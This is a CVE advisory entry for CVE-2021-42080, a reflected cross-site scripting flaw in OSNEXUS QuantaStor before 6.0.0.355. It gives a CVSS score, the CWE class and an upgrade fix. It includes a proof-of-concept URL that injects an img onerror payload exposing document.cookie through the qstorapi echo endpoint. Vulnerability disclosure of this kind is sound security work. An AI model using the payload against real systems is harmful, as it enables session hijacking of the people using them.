CVE-2021-42080
Reflected XSS vulnerability in OSNEXUS QuantaStor before 6.0.0.355
| CVE | CVE-2021-42080 | |||||||||||
| Title | Reflected XSS vulnerability in OSNEXUS QuantaStor before 6.0.0.355 | |||||||||||
| Credits |
|
|||||||||||
| Affected products |
|
|||||||||||
| CVSS |
Base score:
7.4
(HIGH) |
|||||||||||
| References |
|
|||||||||||
| Problem type(s) | CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | |||||||||||
| Date published | ||||||||||||
| Last modified | 11 Mar 2025 13:39 UTC |
Description
An attacker is able to launch a Reflected XSS attack using a crafted URL.
POC:
Visit the following URL
POC:
Visit the following URL
https://<IPADDRESS>:8153/qstorapi/echo?inputMessage=<img%20src=x%20onerror=alert(document.cookie)>
Solution(s)
Upgrade to the latest version of OSNEXUS QuantaStor.
JSON version.